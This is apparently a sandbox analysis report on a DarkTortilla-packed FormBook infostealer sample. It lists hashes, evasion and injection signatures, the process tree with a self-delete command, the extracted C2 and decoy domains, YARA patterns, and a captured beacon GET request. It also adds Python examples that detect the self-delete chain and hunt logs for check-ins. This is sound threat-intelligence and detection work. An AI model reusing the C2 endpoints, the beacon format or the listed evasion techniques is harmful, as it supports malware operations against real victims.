

Windows Analysis Report
yaM8XR1HfL.exe

Overview

General Information

Sample name: yaM8XR1HfL.exe (renamed because the original name is a hash value)
Original sample name: 148da9a63f027b2e7625f0b82b42bc795737b55c46d040af508fdcea2bccad98.exe
Analysis ID: 1465386
MD5: 64a5e155baded9185ecd1fa9946c13aa
SHA1: 4e7c62d7d5b1353bfc0e0220ae89e5409201bc70
SHA256: 148da9a63f027b2e7625f0b82b42bc795737b55c46d040af508fdcea2bccad98
Tags: exe

Detection

DarkTortilla, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Process Tree

  • System is w10x64
  • yaM8XR1HfL.exe (PID: 5160 cmdline: "C:\Users\user\Desktop\yaM8XR1HfL.exe" MD5: 64A5E155BADED9185ECD1FA9946C13AA)
    • yaM8XR1HfL.exe (PID: 1288 cmdline: "C:\Users\user\Desktop\yaM8XR1HfL.exe" MD5: 64A5E155BADED9185ECD1FA9946C13AA)
    • yaM8XR1HfL.exe (PID: 7064 cmdline: "C:\Users\user\Desktop\yaM8XR1HfL.exe" MD5: 64A5E155BADED9185ECD1FA9946C13AA)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WWAHost.exe (PID: 4424 cmdline: "C:\Windows\SysWOW64\WWAHost.exe" MD5: 7C7EDAD5BDA9C34FD50C3A58429C90F0)
          • cmd.exe (PID: 768 cmdline: /c del "C:\Users\user\Desktop\yaM8XR1HfL.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
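The tree above nests explorer.exe under the third sample process because the hollowed sample injected into it; in process-creation telemetry explorer.exe is not a child of the sample. What an EDR actually records is the sample respawning itself twice, then explorer.exe starting a 32-bit system binary (WWAHost.exe) that runs cmd.exe to delete the original file. Note that the cmd.exe command line is recorded as just `/c del "..."` with no argv[0], which is what you get when a process is created with an explicit application path. The report says no Sigma rule matched; the chain is nonetheless scorable from process-creation events alone. The following is an added example, not Joe Sandbox code: the events are constructed from the tree above, and the PPID of the first sample process and of explorer.exe, and the image path of cmd.exe (the report gives only its command line), are assumptions.

```python
"""Score a FormBook-style self-delete chain on process-creation events.

Added example, not Joe Sandbox code. EVENTS is constructed from the report's
process tree; the PPID of the first sample process and of explorer.exe, and
the image path of cmd.exe, are assumptions.
"""
import re
from pathlib import PureWindowsPath

SAMPLE = r"C:\Users\user\Desktop\yaM8XR1HfL.exe"

# (pid, ppid, image, command line)
EVENTS = [
    (1028,  900, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE"),       # ppid assumed
    (5160, 1028, SAMPLE, f'"{SAMPLE}"'),                                        # user launches the sample (ppid assumed)
    (1288, 5160, SAMPLE, f'"{SAMPLE}"'),                                        # DarkTortilla stage respawns itself
    (7064, 1288, SAMPLE, f'"{SAMPLE}"'),                                        # ... and again; FormBook runs from here
    (4424, 1028, r"C:\Windows\SysWOW64\WWAHost.exe", r'"C:\Windows\SysWOW64\WWAHost.exe"'),  # started by the injected explorer.exe
    (768,  4424, r"C:\Windows\SysWOW64\cmd.exe", f'/c del "{SAMPLE}"'),         # image path assumed; no argv[0] in the command line
    (5428,  768, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    # constructed benign noise: a user deleting a file from an ordinary shell
    (9001, 1028, r"C:\Windows\System32\notepad.exe", r'"C:\Windows\System32\notepad.exe"'),
    (9002, 9001, r"C:\Windows\System32\cmd.exe", r'cmd.exe /c del "C:\Users\user\Desktop\notes.txt"'),
]

DEL_RE = re.compile(r'/c\s+del\s+"?([^"]+?)"?\s*$', re.IGNORECASE)


def basename(image):
    return PureWindowsPath(image).name.lower()


def lineage(pid, by_pid):
    """Image names from pid upward, e.g. ['wwahost.exe', 'explorer.exe']."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        _, ppid, image, _ = by_pid[pid]
        names.append(basename(image))
        pid = ppid
    return names


def self_respawned_images(events):
    """Images whose parent runs the same image: the usual prelude to hollowing."""
    by_pid = {e[0]: e for e in events}
    return {e[2].lower() for e in events
            if e[1] in by_pid and by_pid[e[1]][2].lower() == e[2].lower()}


def detect_self_delete(events):
    """Return one alert per cmd.exe '/c del' whose context looks like a post-injection self-delete."""
    by_pid = {e[0]: e for e in events}
    respawned = self_respawned_images(events)
    alerts = []
    for pid, ppid, image, cmdline in events:
        if basename(image) != "cmd.exe" or ppid not in by_pid:
            continue
        m = DEL_RE.search(cmdline)
        if not m:
            continue
        target, chain, reasons = m.group(1), lineage(ppid, by_pid), []
        if target.lower() in respawned:
            reasons.append("deleted file is an executable that respawned itself")
        if len(chain) >= 2 and chain[1] == "explorer.exe" and "\\syswow64\\" in by_pid[ppid][2].lower():
            reasons.append(f"parent {chain[0]} is a SysWOW64 system binary started by explorer.exe")
        if not cmdline.lstrip().lower().startswith(("cmd", '"')):
            reasons.append("command line has no argv[0]: launched with an explicit application path")
        if reasons:
            alerts.append({"pid": pid, "target": target, "chain": chain, "reasons": reasons,
                           "severity": "high" if len(reasons) >= 2 else "low"})
    return alerts


if __name__ == "__main__":
    for a in detect_self_delete(EVENTS):
        print(a["severity"], a["pid"], a["target"], "<-", " <- ".join(a["chain"]))
```

Each reason on its own is weak (users delete files from cmd.exe all day); the score comes from the combination of a self-respawning executable, a SysWOW64 host process spawned by explorer.exe, and the argv-less command line, which is why the benign notepad/cmd pair in the constructed events produces nothing.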
Threat descriptions (Malpedia)

Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name: Formbook, Formbo
Description: FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
Attribution:
  • SWEED
  • Cobalt
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
Malware Configuration

FormBook (one "C2 list" entry and 63 "decoy" domains, all contacted on the same /na10/ path):
{"C2 list": ["www.liamcollinai.com/na10/"], "decoy": ["tetheus.com", "ventlikeyoumeanit.com", "tintbliss.com", "rinabet357.com", "sapphireboutiqueusa.com", "abc8bet6.com", "xzcn3i7jb13cqei.buzz", "pinktravelsnagpur.com", "bt365038.com", "rtpbossujang303.shop", "osthirmaker.com", "thelonelyteacup.com", "rlc2019.com", "couverture-charpente.com", "productivagc.com", "defendercarcare.com", "abcentixdigital.com", "petco.ltd", "oypivh.top", "micro.guru", "hokivegasslots.club", "5663876.com", "symboleffekt.info", "tworiverlabsintake.com", "pegaso.store", "sasoera.com", "material.chat", "taniamckirdy.com", "dansistosproductions.com", "moromorojp.com", "z27e1thx976ez3u.buzz", "skinrenue.com", "nbvci.xyz", "jakobniinja.xyz", "snykee.com", "sl24.top", "wawturkiye.xyz", "virtualeventsbyelaine.com", "giorgiaclerico.com", "d9psk8.xyz", "hard-to-miss.space", "awclog.com", "topcomparativos.com", "somoyboutique.com", "findlove.pro", "zbo170.app", "dexcoenergy.com", "nona23.lat", "ingelset.com", "hexatelier.com", "nftees.tech", "visionarymaterialsinstitute.com", "khanyos.com", "bz59.top", "migraine-treatment-28778.bond", "catboxbot.online", "kkugames.com", "llmsearchoptimization.com", "fipbhvvb.xyz", "vmytzptc.xyz", "intermediafx.shop", "lhrrs.com", "grimreapervalley.com", "discount-fess.space"]}
YARA matches (memory dumps)

Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
  (39 further entries not shown)
YARA matches (unpacked PEs)

Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x17a49:$sqlite3step: 68 34 1C 7B E1
    • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
    • 0x17a78:$sqlite3text: 68 38 2A 90 C5
    • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
    • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
  (9 further entries not shown)
No Sigma rule has matched

Snort IDS alert
Timestamp: 07/01/24-15:55:50.915978
SID: 2031412 (ET TROJAN FormBook CnC Checkin (GET))
Source port: 49718
Destination port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

          AV Detection

Source: http://www.nona23.lat/na10/www.giorgiaclerico.com | Avira URL Cloud: Label: malware
Source: http://www.productivagc.com/na10/www.dexcoenergy.com | Avira URL Cloud: Label: malware
Source: http://www.nona23.lat/na10/ | Avira URL Cloud: Label: malware
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook (configuration identical to the one listed above under the process tree)
Source: yaM8XR1HfL.exe | ReversingLabs: Detection: 68%
Source: Yara match | File source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: yaM8XR1HfL.exe | Joe Sandbox ML: detected
Source: yaM8XR1HfL.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: WWAHost.pdb | source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: WWAHost.pdbUGP | source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: yaM8XR1HfL.exe, yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp
Note: the PDB paths place a copy of WWAHost.exe (0x3090000) and a second mapping of ntdll (0x1450000) inside the sample process itself (process index 4) before WWAHost.exe is ever started, and a further ntdll mapping inside WWAHost.exe (index 9); this is consistent with the "Found direct / indirect Syscall" and user-mode inline-hook signatures listed above, where a fresh ntdll is mapped to sidestep EDR hooks in the loaded one.
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_0017212C memset,FindFirstFileW,FindClose,9_2_0017212C

          Networking

Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 217.160.0.1:80
Source: Malware configuration extractor | URLs: www.liamcollinai.com/na10/
Source: global traffic | HTTP traffic detected:
  GET /na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h HTTP/1.1
  Host: www.nftees.tech
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven null bytes, not printable)
  Note: www.nftees.tech is filed under "decoy" in the extracted configuration, not under "C2 list", yet it is where the observed check-in went. FormBook rotates through the configured domains with the same /na10/ path (the DNS queries below and the URL strings in explorer.exe memory show several of them), so the C2/decoy split is a heuristic of the extractor: every configured domain has to be treated as a candidate C2 for blocking and hunting, and the distinguishing feature of the beacon is the request shape (campaign path, two short query keys, long encoded first value, no User-Agent) rather than the host.
Source: Joe Sandbox View | IP Address: 217.160.0.1
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe | Code function: 7_2_09258F82 getaddrinfo,setsockopt,recv,7_2_09258F82
Source: global traffic | DNS traffic detected: DNS query: www.osthirmaker.com
Source: global traffic | DNS traffic detected: DNS query: www.nftees.tech
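Turning the extracted configuration and the observed GET into a hunting query, as an added example that is not Joe Sandbox code: the configuration below is abridged to the single "C2 list" entry plus a few of the 63 "decoy" domains, and the proxy log lines are constructed, the first of them mirroring the check-in the sandbox captured. The point of the scoring is the caveat above: a configured domain only scores high together with this build's campaign path and the beacon shape, the beacon shape alone still flags a request to an unlisted domain (a different build), and an ordinary request to a listed domain is reported at low priority because some decoys are live, unrelated sites.

```python
"""Hunt proxy logs for FormBook check-ins using an extracted configuration.

Added example, not Joe Sandbox code. CONFIG is abridged from the report's
extractor output (the one "C2 list" entry and a few of the 63 "decoy" domains);
LOG is constructed, its first line mirroring the GET the sandbox observed.
"""
import re
from urllib.parse import urlsplit

CONFIG = {
    "C2 list": ["www.liamcollinai.com/na10/"],
    "decoy": ["tetheus.com", "nftees.tech", "osthirmaker.com", "nona23.lat",
              "productivagc.com", "giorgiaclerico.com", "snykee.com"],
}

FAKE_BLOB = "QUFB" * 12   # constructed stand-in for the encoded victim blob in the first query value

# Constructed proxy log: <timestamp> <client> <method> <url> <user-agent or ->
LOG = f"""\
2024-07-01T15:55:50Z 192.168.2.5 GET http://www.nftees.tech/na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h -
2024-07-01T15:56:12Z 192.168.2.5 GET http://www.liamcollinai.com/na10/?y2={FAKE_BLOB}&DV=lbC06h -
2024-07-01T15:57:03Z 192.168.2.9 GET http://www.tetheus.com/ Mozilla/5.0
2024-07-01T15:57:40Z 192.168.2.9 GET http://www.example.com/zz42/?qa={FAKE_BLOB}&kx=9f1cbb -
2024-07-01T15:58:01Z 192.168.2.9 GET http://www.microsoft.com/ Mozilla/5.0
"""

CAMPAIGN_PATH = re.compile(r"^/[A-Za-z0-9]{2,8}/$")   # per-build token such as /na10/
BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")      # first value: long base64-like blob
TAG = re.compile(r"^[A-Za-z0-9]{4,12}$")              # second value: short tag


def norm_host(host):
    return (host or "").lower().removeprefix("www.")


def campaign_path(config):
    """'/na10/': the path token every domain in this build is contacted on."""
    _, _, path = config["C2 list"][0].partition("/")
    return "/" + path.strip("/") + "/"


def domain_roles(config):
    """Map each configured domain to the label the extractor gave it ('c2' or 'decoy')."""
    roles = {norm_host(urlsplit("//" + u).hostname): "c2" for u in config["C2 list"]}
    for d in config["decoy"]:
        roles.setdefault(norm_host(d), "decoy")
    return roles


def checkin_shape(url, user_agent):
    """FormBook GET check-in: /<token>/?<2-char key>=<blob>&<2-char key>=<tag>, no User-Agent."""
    p = urlsplit(url)
    if not CAMPAIGN_PATH.match(p.path) or user_agent not in ("-", ""):
        return False
    pairs = [kv.split("=", 1) for kv in p.query.split("&") if "=" in kv]
    if len(pairs) != 2 or any(len(k) != 2 for k, _ in pairs):
        return False
    (_, blob), (_, tag) = pairs
    return bool(BLOB.match(blob) and TAG.match(tag))


def hunt(log_text, config):
    """Score every log line; return only the ones worth a look, most specific verdict first."""
    path, roles = campaign_path(config), domain_roles(config)
    hits = []
    for line in log_text.splitlines():
        ts, client, method, url, ua = line.split(" ")
        p = urlsplit(url)
        host = norm_host(p.hostname)
        shape = method == "GET" and checkin_shape(url, ua)
        if host in roles and p.path == path and shape:
            verdict = "formbook-checkin"   # configured domain + this build's path + beacon shape
        elif shape:
            verdict = "shape-only"         # beacon shape to an unlisted domain: another build?
        elif host in roles:
            verdict = "config-domain"      # listed domain, ordinary request: may be a live decoy site
        else:
            continue
        hits.append({"ts": ts, "client": client, "host": host,
                     "role": roles.get(host, "unlisted"), "verdict": verdict})
    return hits


if __name__ == "__main__":
    for h in hunt(LOG, CONFIG):
        print(h)
```

On the constructed log the first hit is the sandbox's own beacon to www.nftees.tech, reported as a full check-in even though the extractor labelled that domain a decoy; the line to www.tetheus.com with a browser User-Agent and no campaign path comes back only as "config-domain".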
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000007.00000000.2496782788.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: yaM8XR1HfL.exe, 00000000.00000002.2508647443.0000000005F43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://iptc.org/std/Iptc4xmde
Source: yaM8XR1HfL.exe, 00000000.00000002.2508647443.0000000005F43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000007.00000000.2501022529.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2501770890.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3301294769.0000000008870000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory (FormBook's URL rotation as left in explorer.exe memory: for each configured domain the bare host, the /na10/ campaign path, and that path followed by the host tried next, so the sequence reads osthirmaker -> nftees -> nbvci -> abc8bet6 -> productivagc -> dexcoenergy -> hokivegasslots -> thelonelyteacup -> snykee -> awclog -> sasoera -> liamcollinai -> nona23 -> giorgiaclerico -> bz59 -> jakobniinja; the "Referer:" suffixes are adjacent HTTP header text, not part of the URL):
  • http://www.abc8bet6.com
  • http://www.abc8bet6.com/na10/
  • http://www.abc8bet6.com/na10/www.productivagc.com
  • http://www.abc8bet6.comReferer:
  • http://www.awclog.com
  • http://www.awclog.com/na10/
  • http://www.awclog.com/na10/www.sasoera.com
  • http://www.awclog.comReferer:
  • http://www.bz59.top
  • http://www.bz59.top/na10/
  • http://www.bz59.top/na10/www.jakobniinja.xyz
  • http://www.bz59.topReferer:
  • http://www.dexcoenergy.com
  • http://www.dexcoenergy.com/na10/
  • http://www.dexcoenergy.com/na10/www.hokivegasslots.club
  • http://www.dexcoenergy.comReferer:
  • http://www.giorgiaclerico.com
  • http://www.giorgiaclerico.com/na10/
  • http://www.giorgiaclerico.com/na10/www.bz59.top
  • http://www.giorgiaclerico.comReferer:
  • http://www.hokivegasslots.club
  • http://www.hokivegasslots.club/na10/
  • http://www.hokivegasslots.club/na10/www.thelonelyteacup.com
  • http://www.hokivegasslots.clubReferer:
  • http://www.jakobniinja.xyz
  • http://www.jakobniinja.xyz/na10/
  • http://www.jakobniinja.xyz/na10/e
  • http://www.jakobniinja.xyzReferer:
  • http://www.liamcollinai.com
  • http://www.liamcollinai.com/na10/
  • http://www.liamcollinai.com/na10/www.nona23.lat
  • http://www.liamcollinai.comReferer:
  • http://www.nbvci.xyz
  • http://www.nbvci.xyz/na10/
  • http://www.nbvci.xyz/na10/www.abc8bet6.com
  • http://www.nbvci.xyzReferer:
  • http://www.nftees.tech
  • http://www.nftees.tech/na10/
  • http://www.nftees.tech/na10/www.nbvci.xyz
  • http://www.nftees.techReferer:
  • http://www.nona23.lat
  • http://www.nona23.lat/na10/
  • http://www.nona23.lat/na10/www.giorgiaclerico.com
  • http://www.nona23.latReferer:
  • http://www.osthirmaker.com
  • http://www.osthirmaker.com/na10/
  • http://www.osthirmaker.com/na10/www.nftees.tech
